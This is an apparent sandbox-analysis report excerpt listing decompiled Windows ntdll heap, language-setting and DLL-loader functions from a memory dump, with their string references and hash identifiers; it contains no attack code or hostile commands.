                                                0x01472fb2
                                                0x01472fb9
                                                0x00000000
                                                0x00000000
                                                0x01472fc3
                                                0x01472fca
                                                0x00000000
                                                0x00000000
                                                0x01472fd0
                                                0x01472fd6
                                                0x01472fd9
                                                0x01472ff8
                                                0x01472ffd
                                                0x01472fdb
                                                0x01472ff0
                                                0x01472ff5
                                                0x0147300e
                                                0x0147300f
                                                0x0147301a
                                                0x00000000
                                                0x01472f29
                                                0x01472f29
                                                0x01472f2c
                                                0x01472f4b
                                                0x01472f50
                                                0x01472f2e
                                                0x01472f43
                                                0x01472f48
                                                0x01472f56
                                                0x01472f64
                                                0x01472f6c
                                                0x01472f6c
                                                0x01472f72
                                                0x01472f76
                                                0x01472f7c
                                                0x01472f83
                                                0x01472f89
                                                0x01472f8a
                                                0x01472f8a
                                                0x00000000
                                                0x01472f76
                                                0x01472f27
                                                0x01472e6d
                                                0x01472da6
                                                0x01472dab
                                                0x01472db3
                                                0x01472db9
                                                0x014730bc
                                                0x014730c1
                                                0x014730c1

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 0-1745908468
                                                • Opcode ID: 792700cdff80609c220cdde37f858b66541aec078b33fa0e111b99c97ac9f295
                                                • Instruction ID: e21e9cdde5cc45ffd74bd8a4e55f490c55a4e09948ba3c39152ce4e11571e1be
                                                • Opcode Fuzzy Hash: 792700cdff80609c220cdde37f858b66541aec078b33fa0e111b99c97ac9f295
                                                • Instruction Fuzzy Hash: 74912171A00681DFDB22DFA9C454AEEBFF2FF58614F08801EE5465B7A1C7769842DB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013C3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E013C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E013C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E013C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E013C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E013C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E013C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L013D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E013FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01401370(_t276, 0x1394e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E013FBB40(0,  &_v68, _t170);
									if(L013C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E013FBB40(_t257,  &_v68, _t243);
								if(L013C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01401370(_t278, 0x1394e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L013D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E013FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01401370(_v16, 0x1394e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E013FBB40(_t262,  &_v68, _t244);
								if(L013C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01401370(_t282, 0x1394e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E013FBB40(_t262,  &_v68, _t201);
							if(L013C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L013D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E013FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01401370(_t280, 0x1394e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E013FBB40(_t267,  &_v68, _t245);
							if(L013C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01401370(_t284, 0x1394e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E013FBB40(_t267,  &_v68, _t224);
						if(L013C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                0x013c3d3c
                                                0x013c3d42
                                                0x013c3d44
                                                0x013c3d46
                                                0x013c3d49
                                                0x013c3d4c
                                                0x013c3d4f
                                                0x013c3d52
                                                0x013c3d55
                                                0x013c3d58
                                                0x013c3d5b
                                                0x013c3d5f
                                                0x013c3d61
                                                0x013c3d66
                                                0x01418213
                                                0x01418218
                                                0x013c4085
                                                0x013c4088
                                                0x013c408e
                                                0x013c4094
                                                0x013c409a
                                                0x013c40a0
                                                0x013c40a6
                                                0x013c40a9
                                                0x013c40af
                                                0x013c40b6
                                                0x013c40bd
                                                0x013c40bd
                                                0x013c3d83
                                                0x0141821f
                                                0x01418229
                                                0x01418238
                                                0x01418238
                                                0x0141823d
                                                0x0141823d
                                                0x013c3da0
                                                0x013c3daf
                                                0x013c3db5
                                                0x013c3dba
                                                0x013c3dba
                                                0x013c3dd4
                                                0x013c3e94
                                                0x013c3eab
                                                0x013c3f6d
                                                0x013c3f84
                                                0x013c406b
                                                0x013c406b
                                                0x013c406e
                                                0x013c406e
                                                0x013c4070
                                                0x013c4074
                                                0x01418351
                                                0x01418351
                                                0x013c407a
                                                0x013c407f
                                                0x0141835d
                                                0x01418370
                                                0x01418377
                                                0x01418379
                                                0x0141837c
                                                0x0141837c
                                                0x0141835d
                                                0x00000000
                                                0x013c407f
                                                0x013c3f8a
                                                0x013c3f8d
                                                0x013c3f90
                                                0x013c3f95
                                                0x0141830d
                                                0x0141830f
                                                0x013c3f9b
                                                0x013c3fac
                                                0x013c3fae
                                                0x013c3fb1
                                                0x013c3fb1
                                                0x013c3fb6
                                                0x01418317
                                                0x0141831a
                                                0x00000000
                                                0x013c3fbc
                                                0x013c3fc1
                                                0x013c3fc9
                                                0x013c3fd7
                                                0x013c3fda
                                                0x013c3fdd
                                                0x013c4021
                                                0x013c4021
                                                0x013c4029
                                                0x013c4030
                                                0x013c4044
                                                0x013c4046
                                                0x013c4046
                                                0x013c4044
                                                0x013c4049
                                                0x01418327
                                                0x01418334
                                                0x01418339
                                                0x0141833c
                                                0x013c404f
                                                0x013c404f
                                                0x013c404f
                                                0x013c4051
                                                0x013c4056
                                                0x013c4063
                                                0x013c4063
                                                0x013c4068
                                                0x00000000
                                                0x013c4068
                                                0x013c3fdf
                                                0x013c3fe2
                                                0x013c3fe4
                                                0x013c3fe7
                                                0x013c3fef
                                                0x013c4003
                                                0x013c4005
                                                0x013c4005
                                                0x013c400c
                                                0x013c4013
                                                0x013c4016
                                                0x013c4017
                                                0x013c401b
                                                0x013c401e
                                                0x00000000
                                                0x013c401e
                                                0x013c3fb6
                                                0x013c3eb1
                                                0x013c3eb4
                                                0x013c3eb7
                                                0x013c3ebc
                                                0x014182a9
                                                0x014182ab
                                                0x013c3ec2
                                                0x013c3ed3
                                                0x013c3ed5
                                                0x013c3ed8
                                                0x013c3ed8
                                                0x013c3edd
                                                0x014182b3
                                                0x014182b6
                                                0x00000000
                                                0x013c3ee3
                                                0x013c3ee8
                                                0x013c3eed
                                                0x013c3ef0
                                                0x013c3ef3
                                                0x013c3f02
                                                0x013c3f05
                                                0x013c3f08
                                                0x014182c0
                                                0x014182c3
                                                0x014182c5
                                                0x014182c8
                                                0x014182d0
                                                0x014182e4
                                                0x014182e6
                                                0x014182e6
                                                0x014182ed
                                                0x014182f4
                                                0x014182f7
                                                0x014182f8
                                                0x014182fc
                                                0x014182ff
                                                0x014182ff
                                                0x013c3f0e
                                                0x013c3f11
                                                0x013c3f16
                                                0x013c3f1d
                                                0x013c3f31
                                                0x01418307
                                                0x01418307
                                                0x013c3f31
                                                0x013c3f39
                                                0x013c3f48
                                                0x013c3f4d
                                                0x013c3f50
                                                0x013c3f50
                                                0x013c3f53
                                                0x013c3f58
                                                0x013c3f65
                                                0x013c3f65
                                                0x013c3f6a
                                                0x00000000
                                                0x013c3f6a
                                                0x013c3edd
                                                0x013c3dda
                                                0x013c3ddd
                                                0x013c3de0
                                                0x013c3de5
                                                0x01418245
                                                0x013c3deb
                                                0x013c3df7
                                                0x013c3dfc
                                                0x013c3dfe
                                                0x013c3e01
                                                0x013c3e01
                                                0x013c3e06
                                                0x0141824d
                                                0x0141824f
                                                0x01418254
                                                0x00000000
                                                0x013c3e0c
                                                0x013c3e11
                                                0x013c3e16
                                                0x013c3e19
                                                0x013c3e29
                                                0x013c3e2c
                                                0x013c3e2f
                                                0x0141825c
                                                0x0141825f
                                                0x01418261
                                                0x01418264
                                                0x0141826c
                                                0x01418280
                                                0x01418282
                                                0x01418282
                                                0x01418289
                                                0x01418290
                                                0x01418293
                                                0x01418294
                                                0x01418298
                                                0x0141829b
                                                0x0141829b
                                                0x013c3e35
                                                0x013c3e38
                                                0x013c3e3d
                                                0x013c3e44
                                                0x013c3e58
                                                0x014182a3
                                                0x014182a3
                                                0x013c3e58
                                                0x013c3e60
                                                0x013c3e6f
                                                0x013c3e74
                                                0x013c3e77
                                                0x013c3e77
                                                0x013c3e7a
                                                0x013c3e7f
                                                0x013c3e8c
                                                0x013c3e8c
                                                0x013c3e91
                                                0x00000000
                                                0x013c3e91

                                                Strings
                                                • WindowsExcludedProcs, xrefs: 013C3D6F
                                                • Kernel-MUI-Language-SKU, xrefs: 013C3F70
                                                • Kernel-MUI-Language-Allowed, xrefs: 013C3DC0
                                                • Kernel-MUI-Language-Disallowed, xrefs: 013C3E97
                                                • Kernel-MUI-Number-Allowed, xrefs: 013C3D8C
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: 556755c5bd2eea67af5010e2efa7f6d9cdab52eec11164535239daabad7d52b3
                                                • Instruction ID: 6c0078297ccae7bf674ecb7144b11400e888aea194efcf9b197e8611b7c126f2
                                                • Opcode Fuzzy Hash: 556755c5bd2eea67af5010e2efa7f6d9cdab52eec11164535239daabad7d52b3
                                                • Instruction Fuzzy Hash: 26F14E72D0021AEFDB12DF98C980EEFBBB9FF58A54F15406AE905A7250D7349E01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013B40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 29%
                                                			E013B40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E013BB150(", passed to %s", _t29);
					}
					_push("\n");
					E013BB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x14a6378 = 1;
						asm("int3");
						 *0x14a6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                0x013b40e6
                                                0x013b40e8
                                                0x013b40f1
                                                0x0141042d
                                                0x0141044c
                                                0x01410451
                                                0x0141042f
                                                0x01410444
                                                0x01410449
                                                0x0141045d
                                                0x01410466
                                                0x0141046e
                                                0x01410474
                                                0x01410475
                                                0x0141047a
                                                0x0141048a
                                                0x0141048c
                                                0x01410493
                                                0x01410494
                                                0x01410494
                                                0x00000000
                                                0x0141049b
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                • API String ID: 0-188067316
                                                • Opcode ID: 210a7d9f9451cfac4c976eac90b749814c184287492acfe1dfab77c7d7eae38d
                                                • Instruction ID: e08c18edc036732c1bb5a1541a5c1fd32d663efef0f15f2fac0737e2e91bc7ec
                                                • Opcode Fuzzy Hash: 210a7d9f9451cfac4c976eac90b749814c184287492acfe1dfab77c7d7eae38d
                                                • Instruction Fuzzy Hash: E8014C721412419EE325976EE49EF92BBA8DB00B38F19803EF10547B55EEF89480C214
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013D5600, Relevance: 6.2, Strings: 3, Instructions: 2418COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: dfa3a86c1ff18873f1fe638bb0e84c7d0785f181fc3411a796d5e568e7535085
                                                • Instruction ID: f431bab5993b904da84d6049f399df9018e728739d5dad3127cbd069c74fa49d
                                                • Opcode Fuzzy Hash: dfa3a86c1ff18873f1fe638bb0e84c7d0785f181fc3411a796d5e568e7535085
                                                • Instruction Fuzzy Hash: FA23C1B1A00219DFDB15CF68D4807ADBBF5FF49308F1481AAE85AAB356D734A846CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: , xrefs: 014222E6, 014223F6
                                                • HEAP[%wZ]: , xrefs: 014222D7, 014223E7
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01422403
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 014222F3
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                • API String ID: 0-1657114761
                                                • Opcode ID: 323c5a6339921f77e7b3d5f0f903916f9bcef4e7c00fe710c69ff97f779cf9fc
                                                • Instruction ID: fe678e065b5f59d5561b381cc0e1689a3cd7ee5df730b25a52928bab159627c2
                                                • Opcode Fuzzy Hash: 323c5a6339921f77e7b3d5f0f903916f9bcef4e7c00fe710c69ff97f779cf9fc
                                                • Instruction Fuzzy Hash: 1DD10175A0020A8FEB19CF6CD680BBABBF1FF48308F158569D9569B742E334E941CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 2994545307-2586055223
                                                • Opcode ID: f1394535976387fe6c773712499ca1b55792773ed806db28aa85dc36ca63f599
                                                • Instruction ID: 9c3f59ef16f5fe7b1386c5fe55b1338f363018a145da4f1e2e781c7dc9f09131
                                                • Opcode Fuzzy Hash: f1394535976387fe6c773712499ca1b55792773ed806db28aa85dc36ca63f599
                                                • Instruction Fuzzy Hash: E75135322046919FE322EB6DD944F677BE8FF84B58F080469F5518B3A1D734E941CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013E8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01429357
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0142933B, 01429367
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0142932A
                                                • LdrpFindDllActivationContext, xrefs: 01429331, 0142935D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 0-3779518884
                                                • Opcode ID: f4a030a45c67b06b60eeb24903901017511a11c9e1b1f919fc4b9b5c04b4b40e
                                                • Instruction ID: a5521a44c0b378aae0dad6668ad07bc343945e7c0f42adfccc817e3a63ab77ca
                                                • Opcode Fuzzy Hash: f4a030a45c67b06b60eeb24903901017511a11c9e1b1f919fc4b9b5c04b4b40e
                                                • Instruction Fuzzy Hash: DB412932E003359EEF35AA5DC84DA76BAE4AB8425CF4645EAD90C575E1E770AD8083C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014749A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 2994545307-336120773
                                                • Opcode ID: 4b1c1867d1b2af0da111422d984be863fae0df8496eda04e18b9d702bcc1d7a9
                                                • Instruction ID: 05673acee5e5d7937a712ba7ce90270508450b8f51f13cf47d23524f50e694eb
                                                • Opcode Fuzzy Hash: 4b1c1867d1b2af0da111422d984be863fae0df8496eda04e18b9d702bcc1d7a9
                                                • Instruction Fuzzy Hash: 56312871100151EFDB21EBADC885FF7B7ACEF04628F18405AF505DB361EA74A944CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013D99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 44fce0629ced90a466c3a93bf3236c2671a543b829181fa8ad01e2f2887dbc6e
                                                • Instruction ID: 4aaf2074cbb7b49eb56351cb33526a0b12f98ae13bf8e6f2f9f5ca5888bdb435
                                                • Opcode Fuzzy Hash: 44fce0629ced90a466c3a93bf3236c2671a543b829181fa8ad01e2f2887dbc6e
                                                • Instruction Fuzzy Hash: 3E2212706002569FEB25CF2DC484B7ABBB5EF44B08F18856EE8468B366E775D881CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DB477, Relevance: 4.2, Strings: 3, Instructions: 405COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 1e13d30149a327eed0c4b23674b57c458410396d9964d550b9f162935ff1339f
                                                • Instruction ID: 7bd88a8b431e06535b0a6dc8ebc96c512f7df9ede694d5cc68c98ca2555fdefe
                                                • Opcode Fuzzy Hash: 1e13d30149a327eed0c4b23674b57c458410396d9964d550b9f162935ff1339f
                                                • Instruction Fuzzy Hash: 99E19A71B00209DFDB19CF68D884FAABBB5FF49308F1541AAE5029B7A5D770E981CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013C8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01419C28
                                                • LdrpDoPostSnapWork, xrefs: 01419C1E
                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01419C18
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 2994545307-1948996284
                                                • Opcode ID: e65db58169a63081b00b4af00853a8c02156e70d3f19de91b44b12b5a71709fb
                                                • Instruction ID: 7a7b95b614ef77d5bcd1cc0df2825af301ae51fe2fbf4f8a2edd9ae0d3d447ba
                                                • Opcode Fuzzy Hash: e65db58169a63081b00b4af00853a8c02156e70d3f19de91b44b12b5a71709fb
                                                • Instruction Fuzzy Hash: CB911471A002069BEF18DF5DD880ABB7BB5FF54B18B5540AED905AB654EB30EE01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013EAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: , xrefs: 0142A0BA
                                                • HEAP[%wZ]: , xrefs: 0142A0AD
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0142A0CD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: 09805b016fd136831ce8f99598f7ae9d3875eec213314230becdbd39ed5697c5
                                                • Instruction ID: b5a76055f6869f36defb6eef5b6c1707534b54ea01f075990b8913905951852e
                                                • Opcode Fuzzy Hash: 09805b016fd136831ce8f99598f7ae9d3875eec213314230becdbd39ed5697c5
                                                • Instruction Fuzzy Hash: E381E471204794EFE726CB6CC898BAABBF8FF04718F1441A5E541877A2D779E980CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: 329b358325c242b0756c8fb3ed44c94f4b3d89f572d21cb1848d886b475219cf
                                                • Instruction ID: f6f440d585d0592774362254137be56067f78d852fcad6e5b026b1cb428d48f3
                                                • Opcode Fuzzy Hash: 329b358325c242b0756c8fb3ed44c94f4b3d89f572d21cb1848d886b475219cf
                                                • Instruction Fuzzy Hash: D561FF716002419FDB29CF28D481B6AFFE5FF06308F5A856EE8498B759D770E881CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013C7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpCompleteMapModule, xrefs: 01419898
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01419891
                                                • minkernel\ntdll\ldrmap.c, xrefs: 014198A2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
